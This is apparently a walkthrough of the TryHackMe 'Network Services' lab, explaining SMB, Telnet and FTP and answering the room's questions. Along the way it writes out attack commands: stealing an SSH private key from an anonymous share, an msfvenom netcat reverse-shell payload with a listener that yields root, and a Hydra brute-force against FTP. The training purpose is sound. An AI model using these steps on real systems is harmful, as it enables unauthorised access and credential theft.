Network Services - Common Services

 
head.png
 

The link for this lab is located here: https://tryhackme.com/room/networkservices


This room explores common Network Service vulnerabilities and misconfigurations on services such as SMB, Telnet and FTP - both explaining and exploiting each service.


smb.jpg

Task 2 - Understanding SMB

SMB (Server Message Block Protocol) is a client-server communication protocol used for sharing access to files, printers, serial ports and other resources.

Servers make file systems and other resources available to clients on the network.

The SMB protocol is known as a response-request protocol, meaning it transmits multiple messages between client and server to establish a connection. Clients connect to servers using TCP/IP, NetBEUI or IPX/SPX.

How Does SMB Work?

Once the PCs have established a connection to the server, clients can then send commands (known as SMBs) to the server to allow them to do various things like access shares, open/read/write files and more.

What Runs SMB?

Windows OS since Windows 95 have included client and server SMB protocol support. Samba, an open source server that supports SMB protocol was released for Unix systems.

Questions

Q1: What does SMB stand for? A: Server Message Block

Q2: What type of protocol is SMB? A: Response-Request

Q3: What do clients connect to servers using? A: TCP/IP

Q4: What systems does Samba run on? A: Unix

smb2.png

Task 3 - Enumerating SMB

Enumeration is the process of gathering information on a target in order to find potential attack vectors and aid in exploitation. Enumeration is ESSENTIAL for an attack to be successful - wasting time throwing exploits at a machine hoping it works is not worth it.

Enumeration can gather incredible amounts of information including:

  • usernames

  • passwords

  • network information

  • hostnames

  • application data

  • services

Typically, there are SMB share drives on a server that can be connected to and used to view or transfer files. SMB can often be great to look for sensitive information.

Port Scanning

First step in enumerating is conducting a port scan to find as much starting information about the services as possible - things like the services running, service versions and possibly OS can be detected.

In this room, we will use Nmap but feel free to use any other port scanner you are more comfortable with. For the initial scan, I will be using the Nmap switches “-A” which enables OS detection, version detection, script scanning and traceroute and “-p-” which will scan all 65535 ports.

Enum4Linux

Enum4Linux is a great tool used to enumerate SMB shares on Windows and Linux. It is essentially a wrapper around the tools in the Samba package and makes it easy to extract informaton from the target pertaining to SMB.

The syntax of Enum4Linux is very simple - enum4linux >options> <IP> Some of the most useful operators are:

  • -U (get userlist)

  • -M (get machine list)

  • -N (get namelist dump)

  • -S (get sharelist)

  • -P (get password policy information)

  • -G (get group and member list)

  • -A (all of the above)

Questions

Q1: Conduct an nmap scan of your choosing. How many ports are open? A: For my scan, I choose to do the following command "nmap -sS -A -p- -oA initial 10.10.28.183" which was a TCP SYN Scan, using the -A to get service version and OS detection mainly, "-p-" which specified all ports and "-oA initial" which outputted the result to all 3 formats (XML, Normal, Grepable)

Nmap Scan of SMB Machine

Q2: What port is SMB running on? A: Reading the Nmap output, we see ports 139/445 are running instances of Samba smbd (also tells us the OS is Linux due to Samba)

Q3: Conduct a full basic enumeration using Enum4Linux. What is the workgroup name? A: Running the command "enum4linux -A 10.10.28.183" we get a very large output of information. Combing through it, we can see our WORKGROUP near the top. Remember that -A performs a full basic enumeration (userlist, machine list, sharelist, etc...)

Enum4Linux Output

Q4: What comes up as the name of the machine? A: Scrolling down our Enum4Linux output, we see the name of the machine in the section titled "OS Information". There is no label but highlighted in red will be our machine name.

Hostname of SMB Machine

Q5: What operating system version is running? A: This is in the same section - OS Information - and this time it is clearly labeled.

OS Version of Enum4Linux Output

Q6: What share sticks out as something we might want to investigate? A: For us, when trying to gather information about a machine, one of the key resrouces we want to look for is usernames or possibly credentials. Under the "Share Enumeration" section you will see all the shares available on the machine. To us, the profiles share looks very intriguing.

Profiles Share Seems Interesting

exploit.png

Task 4 - Exploiting SMB

While there are vulnerabilities such as CVE-2017-7494 that can allow remote code execution (RCE) by exploiting SMB, you are more likely to encounter a situation where the best way into a system is due to misconfigurations rather than outdated versions (although they do still occur!)

In the case of this room, we will exploit anonymous SMB shares which is a very common misconfiguration that can allow us to gain information that will lead to a shell - to learn more about anonymouse shares and SMB hacking, I’d recommend this website

Method Breakdown

From our enumeration stage, we know:

  • The SMB share location

  • The name of an interesting share (profiles)

SMBClient

SMBclient is a tool used to access SMB shares. It is pre-installed on Kali Linux and Parrot OS, but if you need to download it, you can find it here

We can remotely access the SMB share by using the syntax:

smbclient //<IP>/<SHARE>

Followed by the tags:

  • -U <name> (specifies the user)

  • -p <port> (specifies the port)

Questions

Q1: What would be the correct syntax to access an SMB share called "secret" as user "suit" on a machine with the IP 10.10.10.2 on the default port? A: First of all, we know that the default port for SMB is 445. The rest is the matter of substituting the credentials we know into the syntax specified above with the -U parameter for the user and -p parameter for the port - smbclient //10.10.10/2/secret -U suit -p 445

SMBClient Command Suits User

Q3: Let's see if the interesting share (profiles) has been configured to allow anonymouse access via the username anonymous, the share of profiles and using no password. Does the share allow anonymouse access (Y/N)? A: Refercing the command in the screenshot above, we know how to use smbclient to accomplish this. Simply change out the sharename from secret to profiles, change the name suit to Anonymouse and leave the default port. When prompted for the password, simply hit enter and you will be greeted with an SMB prompt - we have access!

SMBClient Command Accessing Profiles Folder

Q4: Have a look around for any interesting documents that could contain valuable information. Who can we assume this profile folder belongs to? A: The SMB prompt is very similiar to Linux with regards to commands. Typing "help" at the prompt will reveal all possible commands.

SMB Help Command There is an interesting text document. We can read it using the "more" command and then specifying the file name in quotation marks (because it has spaces) - more "Working From Home Information.txt"

John Cactus Username

We see that there are two possible names this folder can belong to - John Cactus and John. It is more likely that it is John Cactus this folder belongs to as he is the person being addressed in the SMB Share.

Q5: What service has been configured to allow him to work from home? A: Reading the text document in the last question reveals that SSH access has been enabled on his account. SSH allows user to remotely access servers/workstations via credentials using cryptographic keys. It is the secure version of Telnet.

Q6: Now we know this, what directory on the share should we look in? A: We can determine that the folder we want is ".ssh" as it is the same name as the service configured for John Cactus. However, doing a quick Google search will lead us to more information about this folder - if you want more information, click here

Q7: This directory contains authentication keys that allow a user to authenticate themselves on, and then access, a server. Which of these keys is most useful to us? A: The ".ssh" directory contains two keys - a private (id_rsa) and public (id_rsa.pub). Anyone with a copy of the public key can encrypt data which can then only be read by the person who holds the corresponding private key. Therefore, the private key is the most important one to us (id_rsa)

Q8: Now, use the information you have already gathered to work out the username of the account. Then, use the service and key to log-in to the server. A: So, first we need to download the private key to our personal machine. We can do this various ways using various commands. However, there is a builtin SMB command called "get" that will download any specified file to our working directory.

Downloading ID RSA key
Next, we have to change permissions of the private key. SSH is very strict on the permissions of the private key and requires that only you have permissison to read or write to the file only (which would be permission 400 or 600 respectively). So, let's change the permissions to 600 before using it

Changing RSA key permissions
Now that we have the RSA key and the right permissions, we need one more thing - the username. Now, there are two ways to do this. First, we could go through and guess all the common usernames for people - first-name, first-name-last-name, last-name, first-initial-last-name

However, there is a neat little trick here. If you go back to the SMB share and read the public key (id_rsa.pub) via the more command (more id_rsa.pub) you will actually see something very interesting at the end of the file

Finding Username in Public Key
As you can see at the end, there is a username and hostname (cactus = username, polosmb = hostname). From this, we can determine that the username is cactus saving us some time. All that is left for us to do now is connect using the RSA key instead of a password and we will be in.

To connect using an RSA key to a remote host, we use the command "ssh -i id_rsa [username]@[ip]". The "-i" paramter specify the id_rsa key that we want to use. Knowing this, we can simply use the username of cactus and the IP of your target to connect.

Logging in as cactus
As you can see we are now logged in. All that is left is to grab the flag. Doing a simple "ls" command will show a text file. Inside, you will find your flag for this task.

Grabbing SMB.txt flag

telnet.jpg

Task 5 - Understanding Telnet

Telnet is an application protocol which allows you to connect and execute commands on a remote machine hosting a Telnet server. The telnet client will establish a connection with the server. The client will then become a virtual terminal - allowing you to interact with the remote host.

Telnet however, sends ALL messages in clear text and has no specific security mechanisms. In many real-world environments, Telnet has been replaced by SSH

Telnet works by the user connecting to the server using the Telnet protocol which means entering “telnet” into a terminal. The user then executes commands on the server using specific Telnet commands in the Telnet prompt. To connect to a Telnet server you can use the syntax:

telnet <IP> <port>

Questions

Q1: What is Telnet? A: Application Protocol

Q2: What has slowly replaced Telnet? A: SSH

Q3: How would you connect to a Telnet server with the IP 10.10.10.3 on port 23? A: We know looking above that the syntax is simply typing the telnet command with the IP first and the port second hence our command would be: telnet 10.10.10.3 23

Q4: The lack of what, means that all Telnet communications is in plaintext? A: Encryption

enum.jpg

Task 6 - Enumerating Telnet

Again, the first step is doing a port scan to find out as much information about the services, applications, structure and possible OS of the target. As discussed in the “Enumerating SMB” section, I will be performing the following Nmap scan (feel free to run your own with different flags):

nmap -sS -A -p- -oA initial 10.10.197.79

Questions

Q1: How many ports are open on the target machine? A: Running our scan and looking at the results, we can see that only 1 port is open - port 8012

Port 8012 is open

Q2: What port is this? A: Looking at the results from Q1, we can see it is port 8012

Q3: This port is unassigned but still lists the protocol it is using, what protocol is this? A: Looking at the Nmap scan, next to the port number there is a "/" followed by the protocol in use. In this case, "/tcp"

Q4: Now re-run the nmap scan without the "-p-" tag, how many ports show up as open? A: Omitting the "-p-" will scan the 1000 most common ports by default. In this case, our scan will return with no open ports.

No Common ports open

Here we see that by assinging telnet to a non-standard port, it is NOT part of the most common ports. It is important to try every angle when enumerating!

Q6: Based on the title returned to us, what do we think this port could be used for? A: Looking at the output, we see an interesting string - "SKIDY'S BACKDOOR" which seems unusual. A backdoor refers to any method by which authorized and unauthorized users are able to get around normal security measures and gain high level user access (aka root access) on a computer system, network, or software application.

Skidy Backdoor

Q7: Who could it belong to? A: The previous string - "SKIDY'S BACKDOOR" - seems to indicate that a user called Skidy executed a backdoor on this machine and is using it himself.

vuln.jpg

Task 7 - Exploiting Telnet

Telnet is insecure for the lack of cryptrography - it sends all its communication over plaintext and also has poor access control. There are various CVE’s for Telnet client and server systems you could check on these sites:

A CVE (Common Vulnerabilities and Exposures) is a list of publicly disclosed computer security flaws. However, in the real world you are far more likely to find a misconfiguration in how it has been configured or is operating that will allow exploitation.

From the enumeration stage, we know:

  • There is a poorly hidden telnet service running

  • The service itself is a backdoor

  • Possible username of Skidy implicated

Using this information, we can connect to the Telnet port to maybe get a reverse shell on the machine. You can connect using Telnet via the following syntax:

telnet [ip] [port]

Before we run this, we need to discuss what a reverse shell is. A “shell” is simply described as a piece of code or program that can be used to gain code or command execution on a device.

A reverse shell is a type of shell in which the target communicates BACK to us on our machine. Our machine has a listening port on which it receives the connection resulting in code or command execution.

First, let’s connect using Telnet via the following command:

telnet 10.10.197.79 8012

tel.png

Questions

Q2: We have an open telnet connection. What welcome message do we receive? A: The very last sentence reveals our welcome message. In this case, it says "SKIDY'S BACKDOOR"

Welcome Message

Q3: Try executing some commands. Do we get a return on any input we enter into the telnet session (Y/N)? A: Typing .HELP reveals something back to us. However, typing any other commands gives us nothing back. In this case, no return from our input is given back to us.

No Return Input

Let's check if what we are typing is being executed as a system command A: To do this, we can start a tcpdump listener which will simply listen for all traffic on a certain interface (in this case, our OpenVPN interface for TryHackMe). I will not go into detail about TCPDump, but feel free to research on your own.

Using the command "sudo tcpdump ip proto \\icmp -i tun0", we start our listener looking for ICMP traffic (pings).

TCPdump Listener Started Next, try pinging our local machine (my Kali's tun0 IP address) from the target machine using the .RUN command. - .RUN ping 10.11.3.112 -c 1 (the -c 1 only sends one ping).

Running Ping from Target

As we can see, the listener succssfully picks responses from the target.

Pings Work Successfully This means we can execute system commands and we can reach our local machine from the target.

Q6: Do we receive any pings? A: Looking at the last step, we know we can ping our local machine from the target via the Telnet session so we do receive pings.

Now, we can generate a reverse shell payload using msfvenom. This generates and encodes a netcat reverse shell for us. The syntax for this is as follows (your lhost IP will be different):

msfvenom -p cmd/unix/reverse_netcat lhost=10.11.3.112 lport=4444 R

Here is what it all means:

  • msfvenom (the tool to create custom payloads/shells)

  • -p (indicates our payload - in this case cmd/unix/reverse_netcat)

  • lhost (our machine’s IP address)

  • lport (port on OUR machine to listen for connections)

  • R (export the payload in raw format)

Q8: What word does the generated payload start with? A: Running this msfvenom command reveals the full command that we can run on the target machine. As we can see, the first word is mkfifo.

MSFVenom Output First Word

Next, we need to start a netcat listener on our local machine. This is the service that will “catch” the shell from the target machine when it connects back to our machine on the port we specified above (in my case, 4444). To run a netcat listener, we use the command

nc -lvp 4444

Where:

  • -l (stands for listen mode)

  • -v (means verbose output)

  • -p (specifies the port)

Q9: What would the command look like for the listening port? A: We know that the syntax for the command is "nc -lvp [port number]" so our example would be "nc -lvp 4444"

MSFVenom Output First Word

Now that our netcat listener is running waiting for a connection on port 4444, we can copy and paste the raw command from msfvenom (starting from mkfifo) into our Telnet session on the target machine. When ran, it should connect to our Kali machine on port 4444 and give us a shell.

ran2.png

Now that it is ran, we can check our netcat listener and we should see the target machine has connected to us.

connect.png

Now, we can confirm who we are running as on this machine by typing the id command.

root2.png

Perfect. We are root!

Q11: What are the contents of the flag.txt file? A: Doing a simple Linux command - ls - will reveal what is in this directory. There is a flag.txt file. Simply read the flag.txt file and you will get the flag

MSFVenom Output First Word

ftp.jpg

Task 8 - Understanding FTP

FTP (File Transfer Protocol) is a protocol used to allow remote transfer of files over a network. It uses a client-server model and relays commands and data in an efficient way.

A typical FTP session operates using two channels:

  • a command or control channel

  • a data channel

Command channel is used for transmitting and replying to commands while the data channel is used for transferring data.

FTP clients initiate a connection with the server, the server validates the login credentials and then opens the session. When the session is open, the client may execute FTP commands on the server

FTP servers can support Active and Passive connections:

  • Active - client opens a port and listens. Server is required to actively connect to it

  • Passive - server opens a port and listens (passively) and client connects to it

The separation of channels is a way of being able to send commands without having to wait for the current data transfer to finish.

For more details on the technicalities of FTP, you can click here

Questions

Q1: What communications model does FTP use? A: Client-Server

Q2: What is the standard FTP port? A: 21

Q3: How many modes of FTP connection are there? A: 2 - Active and Passive

ftp_enum.jpg

Task 9 - Enumerating FTP

By now, you should be comfortable to perform a port scan effectively. For this stage, we will exploit an anonymous FTP login to see what files we can access and if they contain any information that might be interesting.

It’s worth noting that some vulnerable versions of in.ftpd and other FTP server variants return different responses to the “cwd” command for home directories which exist and don’t exist.

These can be exploited because you can issue “cwd” commands before authentication and if there is a home directory, there is likely a user account to go with it. However, this bug is mainly found in legacy systems but still worth noting. You can read more about it here

Questions

Q1: How many ports are open on the target machine? A: Using my trusty nmap scan (nmap -sS -A -p- -oA initial [IP]), we can that ports 21 and 80 are open.

Nmap Scan for FTP

Q2: What port is FTP running on? A: Looking at our output, we can see that port 21 is running FTP. Additionally, we know from above that port 12 is the default port for FTP.

Q3: What variant of FTP is running? A: Looking at the scan results for port 21, under the VERSION section, you will see the variant is vsftpd.

FTP Variant

Now we know what type of FTP server we are dealing with. Next step is to check if we are able to login anonymously to the FTP server. To do this, we use the simple syntax:

ftp [IP]

When prompted for a username, type “anonymous” and for the password use “anonymous” aswell. When logged in, you can type “help” to get a list of commands you can use (you’ll notice most of them are simple Linux commands)

Q4: What is the name of the file in the anonymous FTP directory? A: Using the ls command, we can see there is a file in the directory called PUBLIC_NOTICE.txt.

File in Anonymous directory

Q4: What do we think a possible username could be? A: To read the file, we first need to download it to our local machine (good practice). This is possible with the "get" command followed by the filename - get PUBLIC_NOTICE.txt (transfer)

Downloading File from FTP

It will download to the directory you started in when connecting to the FTP server. Once you are in that directory, you can simply "cat" out the file to read it locally. (mike)

Reading the file & Gathering Username

After reading the file, we can see it is writing by mike - this could be the username on this machine.

Now that we have a possible username for the FTP server, we can possibly login or crack Mike’s password using Hydra.


exploitation.jpg

Task 10 - Exploiting FTP

Similiar to Telnet, when using FTP the command and data channels are unencrypted. With data from FTP being sent in plaintext, if a Man in the Middle attack took place, an attacker could reveal anything sent (even passwords).

An amazing article written by JScape demonstrates and explains this using ARP Poisoning.

When looking at an FTP server from our position, an avenue we can exploit is weak or default passwords.

From our enumeration stage, we know the following:

  • There is an FTP server running

  • We have a possible username of mike

Using this information, we can try cracking the password of the FTP server using the mike username.

To crack a password, we can use a tool called Hydra. Hydra is an online password cracking tool which performs rapid dictionary attacks against more than 50 protocols including Telnet, HTTP, SMB and much more!

The syntax for using Hydra to bruteforce a password with a given username is the following:

hydra -t 4 -l mike -P /usr/share/wordlists/rockyou.txt -vV 10.10.176.18 ftp”

Note that you may not have rockyou.txt wordlist on your machine. This wordlist is VERY commonly used in CTFs and TryHackMe rooms so it is vital. IF you do not have it downloaded, you can find it here.

The syntax used above uses the following flags:

  • -t 4 (specifies the number of parallel connections per target)

  • -l [user] (username of person you are trying to crack)

  • -P [path to wordlist] (points to the wordlist you want to use)

  • -vV (sets verbose mode, shows every login+password combination)

  • [IP] (specifies target machine)

  • ftp (sets protocol to FTP)

Questions

Q1: What is the password for the user mike? A: Using the command specified above on our attacking machine, it will run Hydra. After a couple of seconds, you will see a highlighted combination revealing the successful password for mike.

Cracking Mike via Hydra

Now that we have a username and password, we can once again connect to the machine using the ftp 10.10.176.18 command but this time using a username of mike and a password of password. Once logged in, we can list the files to see what there is in Mike’s directory.

txt.png
Q3: What is ftp.txt? A: Once again, we see that there is a file called "ftp.txt" located in this directory. We can download it using the "get ftp.txt" command

Downloading FTP.txt file

Once downloaded, we can simply navigate to the directory it got downloaded to and "cat" it out to reveal our flag for this room.

Reading ftp.txt for the Flag

further.jpg

Task 11 - Expanding Your Knowledge

And that’s it! You’ve successfully completed this room. Congratulations. If you want to expand your skills further, check our more TryHackMe rooms or check out some of the following links:


Previous
Previous

Network Services 2 - More Services

Next
Next

Nmap Basics - Network Scanning